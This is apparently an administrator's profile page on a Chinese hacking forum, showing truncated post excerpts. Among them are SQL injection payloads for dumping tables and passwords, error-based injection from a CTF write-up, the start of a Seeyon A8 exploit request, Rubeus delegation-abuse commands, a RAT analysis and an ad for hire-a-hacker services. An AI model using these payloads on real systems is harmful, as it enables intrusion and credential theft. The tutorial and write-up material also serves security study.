Jump to content
请先注册账号再浏览本站!Maak een account aan voordat u deze site bezoekt!

This Wind

Administrator
  • Content Count

    344
  • Joined

  • Last visited

  • Days Won

    42
  • Donations

    $439.00 

This Wind last won the day on September 3

This Wind had the most liked content!

Community Reputation

53 Excellent

Recent Profile Visitors

12,225 profile views
  1. VPN 可绕过互联网审查,然而,凡事有利必有弊,在实践中,攻击者利用VPN或 Tor 浏览器这些加密措施掩盖了攻击。 个人 VPN 服务承诺为用户流量启用安全、加密的隧道。这些VPN 服务提供服务,通过加密互联网连接并保护用户的应用程序使用和浏览历史隐私,从而防止其他人通过这些隧道看到内容。VPN 可绕过互联网审查,然而,凡事有利必有弊,在实践中,攻击者利用VPN或 Tor 浏览器这些加密措施掩盖了攻击。 出于多种原因,网络可见性很重要,包括通过策略实施提高安全性、减少影子 IT 以及快速检测恶意或可疑活动,它可以增强企业的应用程序分析并帮助做出明智的决策。 企业经常使用诸如 Palo Alto Networks Next-Generation Firewalls 等工具来获得对网络流量的巨大可见性。企业可能会尝试获得深入到数据包、应用程序和用户级别的可见性。 此时,我们评估个人 VPN 应用程序及其对企业内网络可见性的风险和威胁。我们将讨论这些应用程序和服务如何绕过防火墙以绕过安全和策略执行机制。 Palo Alto Networks 客户可以通过使用下一代防火墙 App-ID 来保持完整的网络可见性,这有助于识别和清理网络中的个人 VPN。 在企业网络上使用个人 VPN的主要风险 通过VPN,用户可
  2. 2021年8月21日补发,谢谢大家支持。 链接: https://pan.baidu.com/s/1nFu2UhJ2GdmjVHWbcKhSOg 提取码: 8s16
  3. 0x01最基础的注入-union注入攻击 判断是get型还是post型注入; 找到正确的闭合规则; order by 查询字段数; union select 1,2.....查看显示位是第几位,没有的话就试试把id=1的显示位让出来,让其等于id=-1; 第二、三位显示出来了,那么即可在这两个位置写入sql语句; 查询当前数据库,当前mysql用户 union select 1,user(),database(); 查询当前数据库里面的表 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="data_name"; 查询到敏感表名user,继续查询表里面的字段 union select 1,2,group_concat(column_name) from information_schema.columns where table_name="user"; 查询字段,例如“id”、"passwd"的内容 union select 1,id,passwd from user; 拿到用户、密码登入后台。 0x02 Boolean注入攻击-布尔盲注
  4. 为黑客、渗透测试人员和安全研究人员准备的一组很棒的列表。 随时欢迎您的贡献! 很棒的存储库 存储库 描述 安卓安全 Android安全相关资源合集 应用安全 用于了解应用程序安全性的资源 资产发现 在安全评估参与的资产发现阶段提供帮助的资源列表 漏洞赏金 漏洞赏金计划列表和漏洞赏金猎人的文章 Capsulecorp 渗透测试 Vagrant+Ansible 虚拟网络渗透测试实验室。罗伊斯戴维斯“网络渗透测试艺术”的伴侣 周大福 CTF 框架、库、资源和软件列表 网络技能 精心策划的黑客环境列表,您可以在其中合法安全地培训网络技能 开发安全运营 在社区实验和贡献的帮助下,令人敬畏的 DevSecOps 工具列表 嵌入式和物联网安全 关于嵌入式和物联网安全的精选资源列表 开发利用
  5. CNHACKTEAM(CHT)中国黑客论坛,又名CHT HACK 建立已有3年之余,以前 我们以匿名者(非anonymous组织)的身份活动于各大网络安全平台,积累了20+团队技术成员,我们在谷歌上也有相当高的评价,我们的唯一域名是www.cnhackteam.org ,www.cnhackteam.com CNHACK团队非我们官方域名,谨防上当受骗。 注册论坛账号问题,论坛公共板块匿名也可浏览。不注册直接可以查看文章,但是很多内部板块需要注册并拥有团队头衔才可以打开浏览。 为什么我们不开放注册? 过多的烂技术文章乱发、过多的广告发布导致我们不想开放注册,本论坛将在7月22日-8月30日开放注册一段时间,敬请关注。目前已关闭注册! 任务接单 团队拥有接单系统,任务一目了然。不会出现漏单、超时不处理的情况。可以放心联系我们的技术人员。 渗透测试、源码审计、逆向破解、调查取证、黑客攻防、等网络安全业务。 技术QQ:343202158 TG:@H4MrX Fackbook:CNHACKTEAM 推特:@CNHACKTEAM CNHACKTEAM, also known as CHT HACK, has been
  6. 漏洞影响产品版本: 致远A8-V5协同管理软件 V6.1sp1 致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3 致远A8+协同管理软件V7.1 漏洞情况: 访问/seeyon/htmlofficeservlet出现DBSTEP V3.0 0 21 0 htmoffice operate err” POST包: POST /seeyon/htmlofficeservlet HTTP/1.1 Content-Length: 1121 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: xxxxxxxxx Pragma: no-cache DBSTEP V3.0 355 0 666 DB
  7. [toc] 前言 很好的一个题,偏向于真实的实战环境,但是当时没有做出来真的很可惜,幸好赵总在buuctf上复现了这道题,可以让我这个菜鸡得以复现。 解题 进入题目,冬奥会火炬???: 题目给了源码,源码就两个,都非常简单: user.php PHP 1 2 3 4 5 <?php class User{ public $count; } ?> 就定义了一个简单User类。 add_api.php PHP 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 <?php include "user.php"; if($user=unserialize($_COOKIE["data"])){ $count[++$user->count]=1; // 数组$count的第几个属性赋值为1 if($count[]=1){ $user->count+=1; setcookie("data",serialize($us
  8. [toc] 前言 感觉一晚上考完了高考,刚经历完一模二模三模的你还肝得动吗? easy_sql 经测试登录密码出存在 sql 注入: SQL 1 passwd=0')||extractvalue(1,concat(0x7c,(database()),0x7c))#&uname=123 之后用 sqlmap 跑出两个数据表 users、flag,并且过滤了 information,所以用为无列名注入,用 join…using 爆出字段名: SQL 1 2 3 4 5 passwd=0')||extractvalue(1,concat(0x7c,(select * from (select * from flag join flag as a)b),0x7c))#&uname=123 // id passwd=0')||extractvalue(1,concat(0x7c,(select * from (select * from flag join flag as a using(id))
  9. 就在一周前发生严重的勒索软件事件后,Colonial Pipeline将其所有系统恢复为可运行状态时,攻击背后的网络犯罪集团DarkSide声称已夺走了基础设施的控制权,理由是执法部门没收了该设备。 该团伙经营的所有黑暗网站,包括其DarkSide Leaks博客,勒索赎回网站以及违约数据内容传送网络(CDN)服务器,都已经不可用,并且在撰写本文时仍然无法访问。此外,根据DarkSide运营商传递给其附属公司的一份说明,据称,他们的加密货币钱包中的资金被盗窃至一个未知帐户。 英特尔471获得的公告说: “目前,这些服务器无法通过SSH访问,并且主机面板已被阻止。” 开发是在DarkSide出于“来自美国的压力”而关闭其勒索软件(RaaS)联盟计划的良好时机,该组织指出,他们将向受攻击的公司的所有分支机构发放解密器。 ,并承诺在5月23日之前补偿所有未清的财务义务。 尽管撤军事件标志着殖民地管道传奇事件的出人意料的转折,但值得注意的是,没有证据公开证实这些说法,引发了人们的担忧,即这可能是一种出口骗局,这是近年来困扰非法黑网 市场的一种卑鄙的策略,或者该团伙给人的印象是,它已从聚光灯下撤退,只是重新塑造品牌并秘密地以另一种形式继续运营,而没有引起不必要的关注。 根据区块链分析公司Elliptic的说法,DarkSide勒索者使用的比特
  10. 概述 该漏洞解决了两个问题 1.禁止协议转换/协议过渡 2.受保护的用户和敏感用户不能被委派 具体设置表现为DC上设置Service1计算机账户为“仅使用Kerberos”而非“使用任何身份验证协议” 域环境 DC:WIN-5CHMN9C4UES.YAYI.local (Windows Server 2012) 域内两台机器: one2008.YAYI.local (Windows Server 2008) WIN-BMIO66D4K15.YAYI.local (Windows 7) 域用户: fwwr joke 传统的约束委派绕过 服务用户: 委派对象:目标机器WIN-5CHMN9C4UES.YAYI.local 常规的约束委派利用: 1. 得到约束委派机器的用户凭证 2. 发现委派用户委派的目标机器 3. 获取RC4利用 powerview查看约束委派的机器: Get-DomainComputer -TrustedToAuth -Properties distinguishedname,msds-allowedtodelegateto | fl Rubeus一条命令实现约束委派: Rubeus.exe s4u /
  11. 参考链接:https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america VT查杀 初始文件 方式:office vba远程模板加载 随机加载http://azulviagens.online/1-9.docx将下载并执行其中一个模板。 每个文件都具有相同的内容(相同的SHA-256:338b2d8d76f4028bfbd177127371b2509971606553d606c534316dc40cfa8fb9) 模板文件 模板文件(“ 1.docx” …“ 9x.docx”)遵循图4(如下所示)所示的结构。结构中的settings.xml具有指向XLSM文件的“目标”字段,该字段位于DOCX文件结构的“嵌入”目录中。XLSM文件“ Microsoft_Excel_Macro-Enabled_Worksheet.xlsm”到“ Microsoft_Excel_Macro-Enabled_Worksheet9.xlsm”具有相同的内容(相同的SHA-256:32f1a502126b1932e1def04b98d8be235c8d25ef7268f8cb35d460cd073a88b2)。当Microsoft Wo
  12. 什么是缓冲区溢出? 缓冲区是易失性的内存分配,它们在将数据从一个位置传输到另一位置时临时保存数据。当正在处理的数据超出存储缓冲区的存储容量时,将发生缓冲区溢出。这导致程序覆盖相邻存储器位置中的过大数据,从而导致缓冲区溢出。当我们对char类型的缓冲区进行操作时,将发生缓冲区溢出。 我们将通过一些示例来尝试理解这个概念。例如,缓冲区的设计方式是接受8个字节的数据,在这种情况下,如果用户输入的数据超过8个字节,则超过8个字节的数据将覆盖相邻的内存,从而超过分配的缓冲区边界。最终将产生分段错误,随后出现许多其他错误,从而导致程序执行被终止。 缓冲区溢出的类型 缓冲区溢出有两种类型。让我们讨论两者的简短介绍。 堆栈缓冲区溢出/Vanilla Buffer缓冲区溢出 当程序覆盖缓冲区边界之外的程序的调用堆栈上的内存地址时,就会发生这种情况,缓冲区边界的长度是固定的。在堆栈缓冲区溢出中,多余的数据将被写入位于堆栈上的相邻缓冲区中。由于与堆栈上溢出的相邻内存位置中的内存损坏相关的错误,通常会导致应用程序崩溃。 堆缓冲区溢出 堆是用于管理动态内存分配的内存结构。它通常用于分配在编译时未知大小的内存,因为所需的内存量太大,以致于无法将其装入堆栈中。堆溢出或溢出是堆数据区域中发生的一种缓冲区溢出。基于堆的溢出利用不同于基于堆栈的溢出利用。
  13. 这个很简单啊 用shell直接烧进去就行了。
  14. 漏洞点:application \ api \ controller \ Common.php 触发突破的网址:/ index / ajax / upload 要求:application \ extra \ upload.php里的chunking为true(分片上传为true) 复现过程 脆弱点分析 需要包括以下的post请求参数才行 1.chunkid参数 2.action参数 3.chunkindex参数 4.chunkcount参数 5.filename参数 调用chunk函数chunk($ chunkid,$ chunkindex,$ chunkcount);进入分片文件上传 跟进chunk函数, 1.首先$ destDir = RUNTIME_PATH / chunks路径,RUNTIME = ROOT_PATH。'运行' 。DS(DS =根据系统的文件分隔符) 2. $ fileName = $
  15. CloudFlare通知我们他们已经更新了默认的WAF规则,以阻止基于java.lang.ProcessBuilder的有效负载。尽管可以使用其他技术来开发替代代码执行有效负载,但我们已经确认,下面描述的有效负载不再有效。我们要赞扬CloudFlare参与对话并采取积极行动来保护其网络及其用户。 2020年4月22日更新:这篇文章的原始版本包含不正确的有效载荷字符串,其中包含不必要的%23。该帖子已使用更正的有效载荷进行了更新。 在最近的长期红队运作中,有必要利用OGNL注入漏洞来获得客户子公司周围的立足点。在对内部网络进行广泛的秘密侦查并利用深奥的Active Directory漏洞之后,有可能利用并损害子公司与母公司之间的林间信任。最终,这导致了母公司的灾难性妥协,并成功完成了运营前概述的所有红色团队目标。 在红色团队运营期间,绝大多数立足点都来自网络钓鱼。使用物理穿透力可以获得少量立足点。在某些情况下,确定子公司与母公司共享内部网络后,子公司本身就成为基于网络的攻击的目标,这通常为寻找更多关键漏洞获得立足点提供了新途径。 这个特殊的子公司从2006年开始运营Confluence的古老版本。但是,此Confluence实例是 在CloudFlare W eb应用程序防火墙(WAF )之后设置的,从而抵消了针对OGNL或SSTI漏洞 的

Follow: 世界中文黑客论坛由CNHACKTEAM[CHT]创建,汇集国内外技术人员,这是一群研究网安黑客攻防技术领域的专家.

法务要求丨Legal丨закон丨القانون

请在学习期间遵守所在国家相关法律,否则后果自负!

Пожалуйста, соблюдайте законы страны, в которой вы находитесь, во время обучения, или будут последствия!

勉強期間中に該当する国の法律を守ってください。そうでなければ結果は自己責任です。

Please abide by the relevant laws of your country during your study, or you will be responsible for the consequences!

官方旗下项目丨About our project

声明:为净化国内外网络安全请勿发布违反国家国定的文章,团队不参与任何涉及黑色产业/攻击/渗透各国正规网站活动,只做网络安全研究,研究网络攻防技术。

世界中文黑客论坛由CNHACKTEAM(CHT)创建,汇集国内外技术人员,这是一群研究网络安全、黑客攻防技术领域的专家,你也可以加入我们!

黑客攻防  技术问答  0day  Hack News  CHT Team  使用指南  商城/Mall  商城订单查询  捐赠/donations  在线用户  X  联系邮箱email:[email protected]

友情链接丨Link丨Связь дружбы

CNHACKTEAM   CHT team official website     www.hac-ker.com     hacked.com.cn     www.77169.net     www.ddosi.com

申请或请未补上链接者联系我们的邮箱,谢谢!

×
×
  • Create New...

Important Information

Please use your computer to visit our website; Please agree to our website rules!Guidelines